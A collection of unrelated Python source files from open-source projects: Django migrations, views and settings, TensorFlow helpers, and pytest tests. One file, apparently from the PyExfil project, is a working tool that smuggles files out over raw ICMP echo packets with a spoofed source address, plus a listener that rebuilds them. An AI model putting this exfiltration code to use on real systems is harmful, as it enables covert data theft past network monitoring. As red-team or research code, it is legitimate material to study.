base85.arnold_b85_encode(struct.pack(data_format, *raw_data))
)
self.assertEqual(
raw_data,
list(struct.unpack('%sB' % len(raw_data),
base85.arnold_b85_decode(encoded_data)))
)
# b85POINT2
raw_data = [0, 0.75, 0.0625, 0.75, 0.125, 0.75, 0.1875, 0.75, 0.25,
0.75, 0.3125, 0.75, 0.375, 0.75, 0.4375, 0.75, 0, 1,
0.0625, 1, 0.125, 1, 0.1875, 1, 0.25, 1, 0.3125, 1, 0.375,
1, 0.4375, 1]
encoded_data = "z8?r5N7e-P78?r5N7reTb8?r5N8$W,M8?r5N8+HY88?r5N8.koX8" \
"?r5N82:0x8?r5N85]GC8?r5Nzy7e-P7y7reTby8$W,My8+HY8y8." \
"koXy82:0xy85]GCy"
data_format = '%sf' % len(raw_data)
self.assertEqual(
encoded_data,
base85.arnold_b85_encode(struct.pack(data_format, *raw_data))
)
self.assertEqual(
raw_data,
list(struct.unpack('%sf' % len(raw_data),
base85.arnold_b85_decode(encoded_data)))
)
# b85POINT
raw_data = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46,
47]
encoded_data = "zy8TFfd8[8>O8b)k:8eM,Z8hpC%8l>YE8oaoe8qI%u8s0108tl<@" \
"8vSGP8x:R`9$v]p9&]i+9(Dt;9)8OC9*,*K9*tZS9+h5[9,[ec9-" \
"O@k9.Bps9/6L&90*'.90rW691f2>92YbF93M=N94@mV954H^96'x" \
"f96L;j96pSn97?kr97d.v983G%98W_)99&w-99K:199oR59:>j99" \
":c-=9;2EA9;V]E9<%uI9<J8M"
data_format = '%sf' % len(raw_data)
self.assertEqual(
encoded_data,
base85.arnold_b85_encode(struct.pack(data_format, *raw_data))
)
self.assertEqual(
raw_data,
list(struct.unpack('%sf' % len(raw_data),
base85.arnold_b85_decode(encoded_data)))
)
|
eoyilmaz/anima
|
tests/arnold/test_base85.py
|
Python
|
mit
| 5,868
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-04-15 18:42
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Attempt',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('attempt_notes', models.TextField(default='')),
],
),
migrations.CreateModel(
name='Climb',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('image', models.ImageField(blank=True, null=True, upload_to='static/img')),
('difficulty', models.IntegerField(choices=[(5, '5'), (6, '6'), (7, '7'), (8, '8'), (9, '9'), (10, '10'), (11, '11'), (12, '12'), (13, '13'), (14, '14')], default=5)),
('grade', models.CharField(choices=[('a', 'a'), ('b', 'b'), ('c', 'c'), ('d', 'd')], default='a', max_length=1)),
('notes', models.TextField(default='')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='attempt',
name='climb',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rockclimb.Climb'),
),
]
|
djstein/hci_final
|
hci/rockclimb/migrations/0001_initial.py
|
Python
|
mit
| 1,801
|
#!/usr/bin/python
import os
import sys
import zlib
import time
import datetime
import base64
from socket import *
from impacket import ImpactPacket
""" Constants """
READ_BINARY = "rb"
WRITE_BINARY = "wb"
READ_FROM_SOCK = 7000
ICMP_HEADER_SIZE = 27
DATA_SEPARATOR = "::"
DATA_TERMINATOR = "\x12\x13\x14\x15"
INIT_PACKET = "\x12\x11\x13\x12\x12\x12"
END_PACKET = "\x15\x14\x13\x12"
LOGFILE_BASENAME = "icmp_log"
LOGFILE_EXT = ".txt"
def send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1):
"""
send_file will send a file to the ip_addr given.
A file path is required to send the file.
Max packet size can be determined automatically.
:param ip_addr: IP Address to send the file to.
:param src_ip_addr: IP Address to spoof from. Default it 127.0.0.1.
:param file_path: Path of the file to send.
:param max_packetsize: Max packet size. Default is 512.
:return:
"""
if file_path == "":
sys.stderr.write("No file path given.\n")
return -1
# Load file
fh = open(file_path, READ_BINARY)
iAmFile = fh.read()
fh.close()
# Create Raw Socket
s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
# Create IP Packet
ip = ImpactPacket.IP()
ip.set_ip_src(src_ip_addr)
ip.set_ip_dst(ip_addr)
# ICMP on top of IP
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
seq_id = 0
# Calculate File:
IamDone = base64.b64encode(iAmFile) # Base64 Encode for ASCII
checksum = zlib.crc32(IamDone) # Build CRC for the file
# Fragmentation of DATA
x = len(IamDone) / max_packetsize
y = len(IamDone) % max_packetsize
# Get file name from file path:
head, tail = os.path.split(file_path)
# Build stream initiation packet
current_packet = ""
current_packet += tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(x + 2) + DATA_TERMINATOR + INIT_PACKET
icmp.contains(ImpactPacket.Data(current_packet))
ip.contains(icmp)
icmp.set_icmp_id(seq_id)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
s.sendto(ip.get_packet(), (ip_addr, 0))
time.sleep(SLEEP)
seq_id += 1
# Iterate over the file
for i in range(1, x + 2):
str_send = IamDone[max_packetsize * (i - 1): max_packetsize * i] + DATA_TERMINATOR
icmp.contains(ImpactPacket.Data(str_send))
ip.contains(icmp)
icmp.set_icmp_id(seq_id)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
s.sendto(ip.get_packet(), (ip_addr, 0))
time.sleep(SLEEP)
seq_id += 1
# Add last section
str_send = IamDone[max_packetsize * i:max_packetsize * i + y] + DATA_TERMINATOR
icmp.contains(ImpactPacket.Data(str_send))
ip.contains(icmp)
seq_id += 1
icmp.set_icmp_id(seq_id)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
s.sendto(ip.get_packet(), (ip_addr, 0))
time.sleep(SLEEP)
# Send termination package
str_send = (tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(seq_id) + DATA_TERMINATOR + END_PACKET)
icmp.contains(ImpactPacket.Data(str_send))
ip.contains(icmp)
seq_id += 1
icmp.set_icmp_id(seq_id)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
s.sendto(ip.get_packet(), (ip_addr, 0))
return 0
def init_listener(ip_addr, saving_location="."):
"""
init_listener will start a listener for incoming ICMP packets
on a specified ip_addr to receive the packets. It will then
save a log file and the incoming information to the given path.
If none given it will generate one itself.
:param ip_addr: The local IP address to bind the listener to.
:return: Nothing.
"""
# Trying to open raw ICMP socket.
# If fails, you're probably just not root
try:
sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)
sock.bind(('', 1))
sys.stdout.write("Now listening...\n")
except:
sys.stderr.write("Could not start listening.\nProbably not root.\n")
raise
# Resetting counters
files_received = 0
i = 0
current_file = ""
# init log file:
current_time_as_string = str(datetime.datetime.now()).replace(":",".").replace(" ", "-")[:-7]
log_fh = open(LOGFILE_BASENAME + current_time_as_string + LOGFILE_EXT, WRITE_BINARY)
log_fh.write("Started logging at %s\n\n" % current_time_as_string)
while True:
# Extract data from IP header
data = sock.recv(READ_FROM_SOCK) # Get data
ip_header = data[:20] # Extract IP Header
# Get IP
ips = ip_header[-8:-4]
source = "%i.%i.%i.%i" % (ord(ips[0]), ord(ips[1]), ord(ips[2]), ord(ips[3]))
# Ignore everything but ECHO requests
if data[20] != "\x08":
pass
elif data[28:].find(INIT_PACKET) != -1:
# Extract data from Initiation packet:
man_string = data[28:] # String to manipulate
man_array = man_string.split(DATA_SEPARATOR) # Exploit data into array
filename = man_array[0]
checksum = man_array[1]
amount_of_packets = man_array[2]
# Document to log file
log_fh.write("Received file:\n")
log_fh.write("\tFile name:\t%s\n" % filename)
log_fh.write("\tIncoming from:\t%s\n" % source)
log_fh.write("\tFile checksum:\t%s\n" % checksum)
log_fh.write("\tIn Packets:\t%s\n" % amount_of_packets)
log_fh.write("\tIncoming at:\t%s\n" % str(datetime.datetime.now()).replace(":", ".").replace(" ", "-")[:-7])
elif data[28:].find(END_PACKET) != -1:
# Extract data from Initiation packet:
man_string = data[28:] # String to manipulate
man_array = man_string.split(DATA_SEPARATOR) # Exploit data into array
if filename != man_array[0]:
sys.stderr.write("You tried transferring 2 files simultaneous. Killing my self now!\n")
log_fh.write("Detected 2 file simultaneous. Killing my self.\n")
return -1
else:
log_fh.write("Got termination packet for %s\n" % man_array[0])
comp_crc = zlib.crc32(current_file)
if str(comp_crc) == checksum:
# CRC validated
log_fh.write("CRC validation is green for " + str(comp_crc) + " with file name: " + filename + "\n")
current_file = base64.b64decode(current_file)
# Write to file
fh = open(filename + "_" + checksum, WRITE_BINARY)
fh.write(current_file)
fh.close()
files_received += 1
else:
# CRC failed
log_fh.write("CRC validation FAILED for '" + str(comp_crc) + "' with : " + checksum + "\n")
# Resetting counters:
i = 0
filename = ""
data = ""
man_string = ""
man_array = []
elif data[28:].find(DATA_TERMINATOR) != -1:
# Found a regular packet
current_file += data[28:data.find(DATA_TERMINATOR)]
log_fh.write("Received packet %s" % i + "\n")
i += 1
if __name__ == "__main__":
sys.stdout.write("This is meant to be a module for python and not a stand alone executable\n")
|
ytisf/PyExfil
|
pyexfil/network/ICMP/icmp_exfiltration.py
|
Python
|
mit
| 6,676
|
from django.http import StreamingHttpResponse, HttpResponseServerError
from download_service.zipbuilder import DDSZipBuilder, NotFoundException, NotSupportedException
from django.contrib.auth.decorators import login_required
from download_service.utils import make_client
from django.http import Http404
@login_required
def dds_project_zip(request, project_id, filename):
client = make_client(request.user)
builder = DDSZipBuilder(project_id, client)
try:
builder.raise_on_filename_mismatch(filename)
response = StreamingHttpResponse(builder.build_streaming_zipfile(), content_type='application/zip')
response['Content-Disposition'] = 'attachment; filename={}'.format(filename)
return response
except NotFoundException as e:
raise Http404(str(e))
except NotSupportedException as e:
return HttpResponseServerError(content=str(e))
|
Duke-GCB/DukeDSHandoverService
|
download_service/views.py
|
Python
|
mit
| 899
|
from celery.schedules import crontab
import djcelery
from django.conf.global_settings import EMAIL_BACKEND
import os, sys, logging
import subprocess
###############################
# MISC #
##############################
ROOT_PATH = os.path.dirname(__file__)
def to_absolute_path(path):
return os.path.realpath(os.path.join(ROOT_PATH, path))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DONATION_DEBUG = True #So we don't have to rely on django's debug.
BLOCK_FB_POSTS = True
#ROOT_PATH = os.path.dirname(__file__)
EXTRA_PATHS = [
'lib',
]
for path in EXTRA_PATHS:
path = to_absolute_path(path)
if path not in sys.path:
sys.path.append(path)
PROXY_SERVER = "PROXY_SERVER"
IGNORE_HTTPS = False
###############################
# CAMPAIGN SETTINGS #
##############################
MAX_PAYMENT_RETRIES = 1
PAYMENT_RETRY_SCHEDULE = [1, 3, 7]
JUMOEIN = ""
###############################
# ADMIN SETTINGS #
##############################
ADMINS = (
('Jumo Site Error', 'EMAIL@HERE'),
)
MANAGERS = ADMINS
###############################
# STATIC SETTINGS #
##############################
SERVE_STATIC_FILES = False
STATIC_URL = ''
NO_STATIC_HASH = False
###############################
# DB SETTINGS #
##############################
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'jumodjango',
'USER': 'jumo',
'PASSWORD': 'DB_PASSWORD',
'HOST': '',
'PORT': '',
},
}
#Map the db name to path of matching schema file.
DATABASE_CREATE_SCHEMAS = {
'default':to_absolute_path('data/schema/jumodjango.schema'),
}
###############################
# SOLR SETTINGS #
##############################
SOLR_CONN = 'http://SOLRSERVER:8983/solr'
###############################
# DISQUS SETTINGS #
##############################
DISQUS_API_VERSION = '3.0'
DISQUS_FORUM_NAME = 'jumoprod'
DISQUS_SECRET_KEY = 'SOME_DISQUS_SECRET_KEY' #jumo_prod_app
DISQUS_PUBLIC_KEY = 'SOME_DISQUS_PUBLIC_KEY' #jumo_prod_app
DISQUS_DEV_MODE = 0 # 1 for dev, 0 for prod and stage
###############################
# EMAIL SETTINGS #
##############################
DEFAULT_FROM_EMAIL = 'FROM@USER'
EMAIL_HOST = ''
EMAIL_PORT = 25
EMAIL_HOST_USER = 'EMAIL@HOSTUSER'
EMAIL_HOST_PASSWORD = 'SOME_EMAIL_HOST_PASSWORD'
EMAIL_USER_TLS = False
CELERY_EMAIL_BACKEND = EMAIL_BACKEND
EMAIL_REAL_PEOPLE = False
CRYPTO_SECRET = r'CRYPTO_SECRET_HERE'
###############################
# CELERY SETTINGS #
##############################
# AMQP setup for Celery
BROKER_HOST = ""
BROKER_PORT = 5672
BROKER_USER = "jumo"
BROKER_PASSWORD = "SOME_BROKER_PASSWORD"
BROKER_VHOST = "/"
CELERY_DEFAULT_QUEUE = "now"
CELERY_QUEUES = {
"now": {
"binding_key": "task.#",
},
"deferred": {
"binding_key": "deferred.#",
},
"billing": {
"binding_key": "billing.#",
},
}
CELERY_DEFAULT_EXCHANGE = "tasks"
CELERY_DEFAULT_EXCHANGE_TYPE = "topic"
CELERY_DEFAULT_ROUTING_KEY = "task.default"
CELERY_ROUTES = {"mailer.reader_tasks.send_jumo_reader_email":
{"queue": "deferred",
"routing_key": "deferred.reader"
},
"donation.tasks.process_donation":
{"queue": "billing",
"routing_key": "billing.process_donation"}
}
CELERY_IMPORTS = ('mailer.notification_tasks',
'mailer.reader_tasks',
'donation.tasks',
'mailer.messager_tasks',)
###############################
# DJANGO SETTINGS #
##############################
CONSOLE_MIDDLEWARE_DEBUGGER = True
APPEND_SLASH = False
#SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'
CACHE_BACKEND = 'memcached://127.0.0.1:11211?timeout=86400'
AUTHENTICATION_BACKENDS = (
'etc.backend.JumoBackend',
)
TIME_ZONE = 'America/New_York'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1337
USE_I18N = True
USE_L10N = True
MEDIA_ROOT = to_absolute_path('static')
MEDIA_URL = '/static/'
ADMIN_MEDIA_PREFIX = '/static/media/admin/'
HTTP_HOST = 'www.ogbon.com'
SECRET_KEY = 'SOME_SECRET_KEY_HERE'
MIDDLEWARE_CLASSES = (
'etc.middleware.SSLMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
#'django.contrib.auth.middleware.AuthenticationMiddleware',
#'django.contrib.messages.middleware.MessageMiddleware',
'etc.middleware.DetectUserMiddleware',
'etc.middleware.SourceTagCollectionMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
'etc.middleware.AddExceptionMessageMiddleware',
)
ROOT_URLCONF = 'urls'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
to_absolute_path('templates'),
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.debug',
'django.core.context_processors.auth',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.request',
'etc.context_processors.general',
)
INSTALLED_APPS = (
'grappelli',
'djcelery',
'django.contrib.auth',
'django.contrib.contenttypes',
#'django.contrib.sessions',
'django.contrib.sites',
#'django.contrib.messages',
'django.contrib.admin',
'django.contrib.humanize',
'cust_admin',
'users',
'issue',
'org',
'data',
'cust_admin',
'etc',
'api',
'lib',
'search',
'utils',
'mailer',
'donation',
'message',
'sourcing',
'popularity',
'django_jenkins',
'tastypie',
'action',
'entity_items',
'commitment',
'debug_toolbar',
'discovery',
)
###############################
# API SETTINGS #
##############################
API_VERSION = 'v1'
###############################
# TESTING SETTINGS #
##############################
FIXTURE_DIRS = ("data/fixtures/",)
TEST_RUNNER = 'jumodjango.test.test_runner.JumoTestSuiteRunner'
JENKINS_TEST_RUNNER = 'jumodjango.test.test_runner.JumoTestSuiteRunner'
EXCLUDED_TEST_PACKAGES = ['django',]
PROJECT_APPS = (
'users',
'issue',
'org',
'mailer',
'donation',
'message',
'sourcing',
'popularity',
)
###############################
# API KEY SETTINGS #
##############################
MIXPANEL_TOKEN = 'SOME_MIXPANEL_TOKEN'
FACEBOOK_APP_ID = 'SOME_FACEBOOK_APP_ID'
FACEBOOK_API_KEY = 'SOME_FACEBOOK_API_KEY'
FACEBOOK_SECRET = 'SOME_FACEBOOK_SECRET'
FACEBOOK_ACCESS_TOKEN = 'SOME_FACEBOOK_ACCESS_TOKEN'
AWS_ACCESS_KEY = 'SOME_AWS_ACCESS_KEY'
AWS_SECRET_KEY = 'SOME_AWS_SECRET'
AWS_PHOTO_UPLOAD_BUCKET = "jumoimgs"
###############################################################
# DATAMINE SETTINGS - serve miner.views if IS_DATAMINE is True
###############################################################
IS_DATAMINE = False
###############################
# DATA SCIENCE TOOLKIT SETTINGS
###############################
# Use their AMI in production,
DSTK_API_BASE = "http://DSTK_HOST"
##############################
# DATAMINE SERVER
##############################
DATAMINE_BASE = "http://DATAMINE_HOST"
##############################
# LOGGER SETTINGS
##############################
LOG_DIR = '/cloud/logs/'
###############################
# DEBUG TOOLBAR SETTINGS
###############################
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TOOLBAR_CALLBACK': lambda x: False
}
DEBUG_TOOLBAR_PANELS = (
'debug_toolbar.panels.version.VersionDebugPanel',
'debug_toolbar.panels.timer.TimerDebugPanel',
'debug_toolbar.panels.settings_vars.SettingsVarsDebugPanel',
'debug_toolbar.panels.headers.HeaderDebugPanel',
'debug_toolbar.panels.request_vars.RequestVarsDebugPanel',
'debug_toolbar.panels.template.TemplateDebugPanel',
'debug_toolbar.panels.sql.SQLDebugPanel',
'debug_toolbar.panels.signals.SignalDebugPanel',
'debug_toolbar.panels.logger.LoggingPanel',
)
###############################
# LOCAL SETTINGS #
##############################
try:
from local_settings import *
except ImportError:
pass
if NO_STATIC_HASH:
ASSET_HASH = 'abcdefg'
else:
import git
repo = git.Repo(to_absolute_path('.'), odbt=git.GitCmdObjectDB)
ASSET_HASH = repo.head.commit.hexsha[0:7]
del(repo)
if IS_DATAMINE:
INSTALLED_APPS += ('miner',
'gunicorn')
RELATED_SEARCH_MODEL_BASE_DIR = '/cloud/data'
LOG_LEVEL = logging.DEBUG if DEBUG else logging.INFO
LOG_FORMAT = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(level=LOG_LEVEL, format=LOG_FORMAT)
log = logging.getLogger('jumo')
|
jumoconnect/openjumo
|
jumodjango/settings.py
|
Python
|
mit
| 8,951
|
# -*- coding:utf8 -*-
# File : tfutils.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 1/31/17
#
# This file is part of TensorArtist.
import re
import tensorflow as tf
class TArtGraphKeys:
PLACEHOLDERS = 'placeholders'
TART_VARIABLES = 'tart_variables'
INFERENCE_SUMMARIES = 'inference_summaries'
SCALAR_VARIABLES = 'scalar_variables'
OPTIMIZER_VARIABLES = 'optimizer_variables'
# DEPRECATED: (2017-12-02)
TART_OPERATORS = 'tart_operators'
def clean_name(tensor, suffix=':0'):
name = tensor.name
if name.endswith(suffix):
name = name[:-len(suffix)]
return name
def escape_name(tensor):
name = tensor.name
return re.sub(':|/', '_', name)
def clean_summary_suffix(name):
return re.sub('_\d+$', '', name)
def remove_tower_name(name):
return re.sub('^tower/\d+/', '', name)
def format_summary_name(name):
name = clean_summary_suffix(name)
name = remove_tower_name(name)
if 'train/' in name:
name = name.replace('train/', '')
name = 'train/' + name
return name
def assign_variable(var, value, session=None, use_locking=False):
from .graph.env import get_default_env
session = session or get_default_env().session
session.run(var.assign(value, use_locking=use_locking))
def fetch_variable(var, session=None):
from .graph.env import get_default_env
session = session or get_default_env().session
try:
return session.run(var)
except tf.errors.FailedPreconditionError:
session.run(var.initializer)
return session.run(var)
def fetch_variables(var_list, session=None):
from .graph.env import get_default_env
session = session or get_default_env().session
try:
return session.run(var_list)
except tf.errors.FailedPredictionError as e:
raise ValueError('Uninitialized variable(s) encountered in fetch_variables') from e
def assign_variables(var_list_or_dict, value_list=None, session=None, use_locking=False):
from .graph.env import get_default_env
session = session or get_default_env().session
assigns = []
if isinstance(var_list_or_dict, dict):
iterator = var_list_or_dict.items()
else:
iterator = zip(var_list_or_dict, value_list)
for var, value in iterator:
assigns.append(tf.assign(var, value, use_locking=use_locking, name='assign_{}'.format(escape_name(var))))
session.run(tf.group(*assigns))
def extend_collection_list(base, *others):
if base is None:
return others
if type(base) is str:
return (base, ) + others
assert isinstance(base, (tuple, list))
return tuple(base) + others
|
vacancy/TensorArtist
|
tartist/nn/tfutils.py
|
Python
|
mit
| 2,691
|
import sys
import py, pytest
import _pytest.assertion as plugin
from _pytest.assertion import reinterpret, util
needsnewassert = pytest.mark.skipif("sys.version_info < (2,6)")
@pytest.fixture
def mock_config():
class Config(object):
verbose = False
def getoption(self, name):
if name == 'verbose':
return self.verbose
raise KeyError('Not mocked out: %s' % name)
return Config()
def interpret(expr):
return reinterpret.reinterpret(expr, py.code.Frame(sys._getframe(1)))
class TestBinReprIntegration:
pytestmark = needsnewassert
def test_pytest_assertrepr_compare_called(self, testdir):
testdir.makeconftest("""
l = []
def pytest_assertrepr_compare(op, left, right):
l.append((op, left, right))
def pytest_funcarg__l(request):
return l
""")
testdir.makepyfile("""
def test_hello():
assert 0 == 1
def test_check(l):
assert l == [("==", 0, 1)]
""")
result = testdir.runpytest("-v")
result.stdout.fnmatch_lines([
"*test_hello*FAIL*",
"*test_check*PASS*",
])
def callequal(left, right, verbose=False):
config = mock_config()
config.verbose = verbose
return plugin.pytest_assertrepr_compare(config, '==', left, right)
class TestAssert_reprcompare:
def test_different_types(self):
assert callequal([0, 1], 'foo') is None
def test_summary(self):
summary = callequal([0, 1], [0, 2])[0]
assert len(summary) < 65
def test_text_diff(self):
diff = callequal('spam', 'eggs')[1:]
assert '- spam' in diff
assert '+ eggs' in diff
def test_text_skipping(self):
lines = callequal('a'*50 + 'spam', 'a'*50 + 'eggs')
assert 'Skipping' in lines[1]
for line in lines:
assert 'a'*50 not in line
def test_text_skipping_verbose(self):
lines = callequal('a'*50 + 'spam', 'a'*50 + 'eggs', verbose=True)
assert '- ' + 'a'*50 + 'spam' in lines
assert '+ ' + 'a'*50 + 'eggs' in lines
def test_multiline_text_diff(self):
left = 'foo\nspam\nbar'
right = 'foo\neggs\nbar'
diff = callequal(left, right)
assert '- spam' in diff
assert '+ eggs' in diff
def test_list(self):
expl = callequal([0, 1], [0, 2])
assert len(expl) > 1
def test_list_different_lenghts(self):
expl = callequal([0, 1], [0, 1, 2])
assert len(expl) > 1
expl = callequal([0, 1, 2], [0, 1])
assert len(expl) > 1
def test_dict(self):
expl = callequal({'a': 0}, {'a': 1})
assert len(expl) > 1
def test_dict_omitting(self):
lines = callequal({'a': 0, 'b': 1}, {'a': 1, 'b': 1})
assert lines[1].startswith('Omitting 1 identical item')
assert 'Common items' not in lines
for line in lines[1:]:
assert 'b' not in line
def test_dict_omitting_verbose(self):
lines = callequal({'a': 0, 'b': 1}, {'a': 1, 'b': 1}, verbose=True)
assert lines[1].startswith('Common items:')
assert 'Omitting' not in lines[1]
assert lines[2] == "{'b': 1}"
def test_set(self):
expl = callequal(set([0, 1]), set([0, 2]))
assert len(expl) > 1
def test_frozenzet(self):
expl = callequal(frozenset([0, 1]), set([0, 2]))
assert len(expl) > 1
def test_Sequence(self):
col = py.builtin._tryimport(
"collections.abc",
"collections",
"sys")
if not hasattr(col, "MutableSequence"):
pytest.skip("cannot import MutableSequence")
MutableSequence = col.MutableSequence
class TestSequence(MutableSequence): # works with a Sequence subclass
def __init__(self, iterable):
self.elements = list(iterable)
def __getitem__(self, item):
return self.elements[item]
def __len__(self):
return len(self.elements)
def __setitem__(self, item, value):
pass
def __delitem__(self, item):
pass
def insert(self, item, index):
pass
expl = callequal(TestSequence([0, 1]), list([0, 2]))
assert len(expl) > 1
def test_list_tuples(self):
expl = callequal([], [(1,2)])
assert len(expl) > 1
expl = callequal([(1,2)], [])
assert len(expl) > 1
def test_list_bad_repr(self):
class A:
def __repr__(self):
raise ValueError(42)
expl = callequal([], [A()])
assert 'ValueError' in "".join(expl)
expl = callequal({}, {'1': A()})
assert 'faulty' in "".join(expl)
def test_one_repr_empty(self):
"""
the faulty empty string repr did trigger
a unbound local error in _diff_text
"""
class A(str):
def __repr__(self):
return ''
expl = callequal(A(), '')
assert not expl
def test_repr_no_exc(self):
expl = ' '.join(callequal('foo', 'bar'))
assert 'raised in repr()' not in expl
def test_python25_compile_issue257(testdir):
testdir.makepyfile("""
def test_rewritten():
assert 1 == 2
# some comment
""")
result = testdir.runpytest()
assert result.ret == 1
result.stdout.fnmatch_lines("""
*E*assert 1 == 2*
*1 failed*
""")
@needsnewassert
def test_rewritten(testdir):
testdir.makepyfile("""
def test_rewritten():
assert "@py_builtins" in globals()
""")
assert testdir.runpytest().ret == 0
def test_reprcompare_notin(mock_config):
detail = plugin.pytest_assertrepr_compare(
mock_config, 'not in', 'foo', 'aaafoobbb')[1:]
assert detail == ["'foo' is contained here:", ' aaafoobbb', '? +++']
@needsnewassert
def test_pytest_assertrepr_compare_integration(testdir):
testdir.makepyfile("""
def test_hello():
x = set(range(100))
y = x.copy()
y.remove(50)
assert x == y
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*def test_hello():*",
"*assert x == y*",
"*E*Extra items*left*",
"*E*50*",
])
@needsnewassert
def test_sequence_comparison_uses_repr(testdir):
testdir.makepyfile("""
def test_hello():
x = set("hello x")
y = set("hello y")
assert x == y
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*def test_hello():*",
"*assert x == y*",
"*E*Extra items*left*",
"*E*'x'*",
"*E*Extra items*right*",
"*E*'y'*",
])
@pytest.mark.xfail("sys.version_info < (2,6)")
def test_assert_compare_truncate_longmessage(testdir):
testdir.makepyfile(r"""
def test_long():
a = list(range(200))
b = a[::2]
a = '\n'.join(map(str, a))
b = '\n'.join(map(str, b))
assert a == b
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*truncated*use*-vv*",
])
result = testdir.runpytest('-vv')
result.stdout.fnmatch_lines([
"*- 197",
])
@needsnewassert
def test_assertrepr_loaded_per_dir(testdir):
testdir.makepyfile(test_base=['def test_base(): assert 1 == 2'])
a = testdir.mkdir('a')
a_test = a.join('test_a.py')
a_test.write('def test_a(): assert 1 == 2')
a_conftest = a.join('conftest.py')
a_conftest.write('def pytest_assertrepr_compare(): return ["summary a"]')
b = testdir.mkdir('b')
b_test = b.join('test_b.py')
b_test.write('def test_b(): assert 1 == 2')
b_conftest = b.join('conftest.py')
b_conftest.write('def pytest_assertrepr_compare(): return ["summary b"]')
result = testdir.runpytest()
result.stdout.fnmatch_lines([
'*def test_base():*',
'*E*assert 1 == 2*',
'*def test_a():*',
'*E*assert summary a*',
'*def test_b():*',
'*E*assert summary b*'])
def test_assertion_options(testdir):
testdir.makepyfile("""
def test_hello():
x = 3
assert x == 4
""")
result = testdir.runpytest()
assert "3 == 4" in result.stdout.str()
off_options = (("--no-assert",),
("--nomagic",),
("--no-assert", "--nomagic"),
("--assert=plain",),
("--assert=plain", "--no-assert"),
("--assert=plain", "--nomagic"),
("--assert=plain", "--no-assert", "--nomagic"))
for opt in off_options:
result = testdir.runpytest(*opt)
assert "3 == 4" not in result.stdout.str()
def test_old_assert_mode(testdir):
testdir.makepyfile("""
def test_in_old_mode():
assert "@py_builtins" not in globals()
""")
result = testdir.runpytest("--assert=reinterp")
assert result.ret == 0
def test_triple_quoted_string_issue113(testdir):
testdir.makepyfile("""
def test_hello():
assert "" == '''
'''""")
result = testdir.runpytest("--fulltrace")
result.stdout.fnmatch_lines([
"*1 failed*",
])
assert 'SyntaxError' not in result.stdout.str()
def test_traceback_failure(testdir):
p1 = testdir.makepyfile("""
def g():
return 2
def f(x):
assert x == g()
def test_onefails():
f(3)
""")
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines([
"*test_traceback_failure.py F",
"====* FAILURES *====",
"____*____",
"",
" def test_onefails():",
"> f(3)",
"",
"*test_*.py:6: ",
"_ _ _ *",
#"",
" def f(x):",
"> assert x == g()",
"E assert 3 == 2",
"E + where 2 = g()",
"",
"*test_traceback_failure.py:4: AssertionError"
])
@pytest.mark.skipif("sys.version_info < (2,5) or '__pypy__' in sys.builtin_module_names or sys.platform.startswith('java')" )
def test_warn_missing(testdir):
p1 = testdir.makepyfile("")
result = testdir.run(sys.executable, "-OO", "-m", "pytest", "-h")
result.stderr.fnmatch_lines([
"*WARNING*assert statements are not executed*",
])
result = testdir.run(sys.executable, "-OO", "-m", "pytest", "--no-assert")
result.stderr.fnmatch_lines([
"*WARNING*assert statements are not executed*",
])
def test_recursion_source_decode(testdir):
testdir.makepyfile("""
def test_something():
pass
""")
testdir.makeini("""
[pytest]
python_files = *.py
""")
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines("""
<Module*>
""")
|
geraldoandradee/pytest
|
testing/test_assertion.py
|
Python
|
mit
| 11,084
|
# -*- coding: utf-8 -*-
from tests import base
from app import pivocram
class PivocramConnetcTest(base.TestCase):
def setUp(self):
self.connect = pivocram.Connect('PIVOTAL_TEST_TOKEN')
def test_should_have_the_pivotal_api_url(self):
